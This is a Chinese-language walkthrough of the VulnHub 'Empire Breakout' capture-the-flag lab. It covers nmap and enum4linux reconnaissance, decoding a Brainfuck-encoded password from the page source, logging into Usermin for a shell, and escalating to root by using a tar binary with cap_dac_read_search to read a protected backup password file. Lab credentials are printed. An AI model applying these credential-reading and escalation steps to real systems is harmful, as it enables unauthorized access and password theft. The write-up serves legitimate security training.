EMPIRE BREAKOUT靶场练习
声明
笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。
✍🏻作者简介:致力于网络安全领域,目前作为一名学习者,很荣幸成为一名分享者,最终目标是成为一名开拓者,很有趣也十分有意义
🤵♂️ 个人主页: @One_Blanks
欢迎评论 💬点赞👍🏻 收藏 📂加关注+
- 关注公众号:泷羽Sec-Blanks
X
带你去体验最真实的渗透环境,文章里不会直接摆答案,会全面的带你去进行信息收集以及漏洞利用,会领着你一步一步踩下我踩过的坑,实战往往比这更绝望,练技术须实践。
目录
靶场下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
参考文章:https://mp.weixin.qq.com/s/aDRrVTpNnzSvR1WwWJNUpQ
一、主机发现+信息收集
(一)信息收集
arp-scan -l
(二)环境变量设置
export ip=192.168.1.131
(三)端口扫描
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
20000/tcp open dnp
MAC Address: 00:0C:29:9F:48:84 (VMware)
(四)服务信息收集
nmap -sS -sV -O -p80,139,445,10000,20000 $ip
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
10000/tcp open http MiniServ 1.981 (Webmin httpd)
20000/tcp open http MiniServ 1.830 (Webmin httpd)
MAC Address: 00:0C:29:9F:48:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
(五)默认脚本扫描
nmap --script=vuln -p80,139,445,10000,20000 $ip
┌──(root㉿kali)-[/home/kali]
└─# nmap --script=vuln -p80,139,445,10000,20000 $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 03:26 EDT
Nmap scan report for 192.168.1.131
Host is up (0.00029s latency).
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.131
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.131:80/manual/es/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/pt-br/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/da/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/fr/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/de/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/zh-cn/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/ru/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/tr/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/ja/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/en/index.html
| Form id:
| Form action: https://www.google.com/search
|
| Path: http://192.168.1.131:80/manual/ko/index.html
| Form id:
|_ Form action: https://www.google.com/search
| http-enum:
|_ /manual/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.exploit-db.com/exploits/1997/
| http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
20000/tcp open dnp
MAC Address: 00:0C:29:9F:48:84 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
二、开始渗透
(一)80端口Web应用
nday
searchsploit Apache 2.4.51
没有历史漏洞
页面访问
http://192.168.1.131
是建站首页,没啥用,看眼源码有信息,直接上目录爆破
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
被查出是 Brainfuck 代码编程语言
https://www.splitbrain.org/services/ook
用上面这个在线网站就可以进行在线解密,结果如下
.2uqPEfj3D<P’a-3
目录爆破(+挂上代理爆破目录)
dirsearch -u http://192.168.1.131/
[03:50:43] 301 - 315B - /manual -> http://192.168.1.131/manual/
[03:50:43] 200 - 208B - /manual/index.html
或者
dirb http://192.168.1.131/
(二)139端口与445端口SMB服务
信息收集
enum4linux -a 192.168.1.131
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Apr 3 09:47:43 2025
=========================================( Target Information )=========================================
Target ........... 192.168.1.131
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.1.131 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.1.131 )===============================
Looking up status of 192.168.1.131
BREAKOUT <00> - B <ACTIVE> Workstation Service
BREAKOUT <03> - B <ACTIVE> Messenger Service
BREAKOUT <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===================================( Session Check on 192.168.1.131 )===================================
[+] Server 192.168.1.131 allows sessions using username '', password ''
================================( Getting domain SID for 192.168.1.131 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.1.131 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.1.131 from srvinfo:
BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
platform_id : 500
os version : 6.1
server type : 0x809a03
=======================================( Users on 192.168.1.131 )=======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
=================================( Share Enumeration on 192.168.1.131 )=================================
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.1.131 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 192.168.1.131
//192.168.1.131/print$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.1.131/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.1.131 )===========================
[+] Attaching to 192.168.1.131 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BREAKOUT
[+] Builtin
[+] Password Info for Domain: BREAKOUT
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.1.131 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 192.168.1.131 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
===============================( Getting printer info for 192.168.1.131 )===============================
No printers returned.
enum4linux complete on Thu Apr 3 09:47:56 2025
找到用户信息 cyber
尝试匿名登录
smbclient -L //192.168.1.131 -N
smbmap -H 192.168.1.131
尝试Nday
searchsploit Samba 4.13.5-Debian
没有结果
(三)10000端口和20000端口
https://192.168.1.131:20000/
这里是Usemin登录界面
https://192.168.1.131:10000/
这里是Webmin登录界面
我们现在有密码和账号
cyber/ .2uqPEfj3D<P’a-3
尝试进行登录成功登录进入了Usermin页面
三、获得初始权限
我们登录进入之后直接获得了可命令执行的权限
这里还是好用的交互式终端
四、提权
低权限用户信息收集
[cyber@breakout ~]$[cyber@breakout~]$ ls -liah
total 568K
790814 drwxr-xr-x 8 cyber cyber 4.0K Apr 3 10:11 .
783372 drwxr-xr-x 3 root root 4.0K Oct 19 2021 ..
791181 prw-r--r-- 1 cyber cyber 0 Apr 3 10:11 backpipe
791183 -rw------- 1 cyber cyber 0 Oct 20 2021 .bash_history
790817 -rw-r--r-- 1 cyber cyber 220 Oct 19 2021 .bash_logout
790816 -rw-r--r-- 1 cyber cyber 3.5K Oct 19 2021 .bashrc
790841 drwxr-xr-x 2 cyber cyber 4.0K Oct 19 2021 .filemin
790838 drwx------ 2 cyber cyber 4.0K Oct 19 2021 .gnupg
790853 drwxr-xr-x 3 cyber cyber 4.0K Oct 19 2021 .local
790815 -rw-r--r-- 1 cyber cyber 807 Oct 19 2021 .profile
790830 drwx------ 2 cyber cyber 4.0K Oct 19 2021 .spamassassin
791179 -rwxr-xr-x 1 root root 520K Oct 19 2021 tar
790836 drwxr-xr-x 2 cyber cyber 4.0K Oct 20 2021 .tmp
790822 drwx------ 17 cyber cyber 4.0K Apr 3 10:02 .usermin
790857 -rw-r--r-- 1 cyber cyber 48 Oct 19 2021 user.txt
[cyber@breakout ~]$[cyber@breakout~]$ cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
除了此处的user的flag我们还得到一个可执行文件tar
[cyber@breakout ~]$[cyber@breakout~]$ ./tar
./tar: You must specify one of the '-Acdtrux', '--delete' or '--test-label' options
Try './tar --help' or './tar --usage' for more information.
[cyber@breakout ~]$[cyber@breakout~]$ ./tar --usage
Usage: tar [-AcdrtuxGnSkUWOmpsMBiajJzZhPlRvwo?] [-g FILE] [-C DIR] [-T FILE]
[-X FILE] [-f ARCHIVE] [-F NAME] [-L NUMBER] [-b BLOCKS]
[-H FORMAT] [-V TEXT] [-I PROG] [-K MEMBER-NAME] [-N DATE-OR-FILE]
[--catenate] [--concatenate] [--create] [--delete] [--diff]
[--compare] [--append] [--test-label] [--list] [--update]
[--extract] [--get] [--check-device] [--listed-incremental=FILE]
[--incremental] [--hole-detection=TYPE] [--ignore-failed-read]
[--level=NUMBER] [--no-check-device] [--no-seek] [--seek]
[--occurrence[=NUMBER]] [--sparse-version=MAJOR[.MINOR]] [--sparse]
[--add-file=FILE] [--directory=DIR] [--exclude=PATTERN]
[--exclude-backups] [--exclude-caches] [--exclude-caches-all]
[--exclude-caches-under] [--exclude-ignore=FILE]
[--exclude-ignore-recursive=FILE] [--exclude-tag=FILE]
[--exclude-tag-all=FILE] [--exclude-tag-under=FILE] [--exclude-vcs]
[--exclude-vcs-ignores] [--no-null] [--no-recursion] [--no-unquote]
[--no-verbatim-files-from] [--null] [--recursion]
[--files-from=FILE] [--unquote] [--verbatim-files-from]
[--exclude-from=FILE] [--anchored] [--ignore-case] [--no-anchored]
[--no-ignore-case] [--no-wildcards] [--no-wildcards-match-slash]
[--wildcards] [--wildcards-match-slash] [--keep-directory-symlink]
[--keep-newer-files] [--keep-old-files] [--no-overwrite-dir]
[--one-top-level[=DIR]] [--overwrite] [--overwrite-dir]
[--recursive-unlink] [--remove-files] [--skip-old-files]
[--unlink-first] [--verify] [--ignore-command-error]
[--no-ignore-command-error] [--to-stdout] [--to-command=COMMAND]
[--atime-preserve[=METHOD]] [--clamp-mtime]
[--delay-directory-restore] [--group=NAME] [--group-map=FILE]
[--mode=CHANGES] [--mtime=DATE-OR-FILE] [--touch]
[--no-delay-directory-restore] [--no-same-owner]
[--no-same-permissions] [--numeric-owner] [--owner=NAME]
[--owner-map=FILE] [--preserve-permissions] [--same-permissions]
[--same-owner] [--sort=ORDER] [--preserve-order] [--same-order]
[--acls] [--no-acls] [--no-selinux] [--no-xattrs] [--selinux]
[--xattrs] [--xattrs-exclude=MASK] [--xattrs-include=MASK]
[--force-local] [--file=ARCHIVE] [--info-script=NAME]
[--new-volume-script=NAME] [--tape-length=NUMBER] [--multi-volume]
[--rmt-command=COMMAND] [--rsh-command=COMMAND] [--volno-file=FILE]
[--blocking-factor=BLOCKS] [--read-full-records] [--ignore-zeros]
[--record-size=NUMBER] [--format=FORMAT] [-- gnu] [-- oldgnu] [--
pax] [-- posix] [-- ustar] [-- v7] [--old-archive]
[--portability]
[--pax-option=keyword[[:]=value][,keyword[[:]=value]]...] [--posix]
[--label=TEXT] [--auto-compress] [--use-compress-program=PROG]
[--bzip2] [--xz] [--lzip] [--lzma] [--lzop] [--no-auto-compress]
[--zstd] [--gzip] [--gunzip] [--ungzip] [--compress] [--uncompress]
[--backup[=CONTROL]] [--hard-dereference] [--dereference]
[--starting-file=MEMBER-NAME] [--newer-mtime=DATE]
[--newer=DATE-OR-FILE] [--after-date=DATE-OR-FILE]
[--one-file-system] [--absolute-names] [--suffix=STRING]
[--strip-components=NUMBER] [--transform=EXPRESSION]
[--xform=EXPRESSION] [--checkpoint[=NUMBER]]
[--checkpoint-action=ACTION] [--full-time] [--index-file=FILE]
[--check-links] [--no-quote-chars=STRING] [--quote-chars=STRING]
[--quoting-style=STYLE] [--block-number] [--show-defaults]
[--show-omitted-dirs] [--show-snapshot-field-ranges]
[--show-transformed-names] [--show-stored-names]
[--totals[=SIGNAL]] [--utc] [--verbose] [--warning=KEYWORD]
[--interactive] [--confirmation] [--help] [--restrict] [--usage]
[--version] [FILE]...
我们可以使用getcap命令查看权限
[cyber@breakout ~]$[cyber@breakout~]$ getcap /home/cyber/tar
/home/cyber/tar cap_dac_read_search=ep
并且发现有cap_dac_read_search权限,任何用户都能用该程序打包自己没有read权限的文件,并且查看
正常思路是查看/etc/shadow文件,然后爆破密钥获得root密码,但这里实在爆破不出来
只能继续找敏感信息文件,这里在/var/backups中找到
var/backups/.old_pass.bak文件
这里没有权限,找个有权限的目录/tmp
cd /tmp
1、打包:/home/cyber/tar -cvf 1.tar /var/backups/.old_pass.bak
ls 可以查看是否创建了 1.tar
2、解包:/home/cyber/tar -xvf 1.tar
3、查看:cat /tmp/var/backups/.old_pass.bak
这里也是成功拿到了密码
Ts&4&YurgtRX(=~h
五、提权成功
我们虽然拿到密码但是su和sudo的权限全被锁了,我们需要想什么可以利用的
这里我们还是用Web页面进行root登录,看看是不是root权限,先退出cyber用户,然后再登录root用户
root
Ts&4&YurgtRX(=~h
提权成功
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
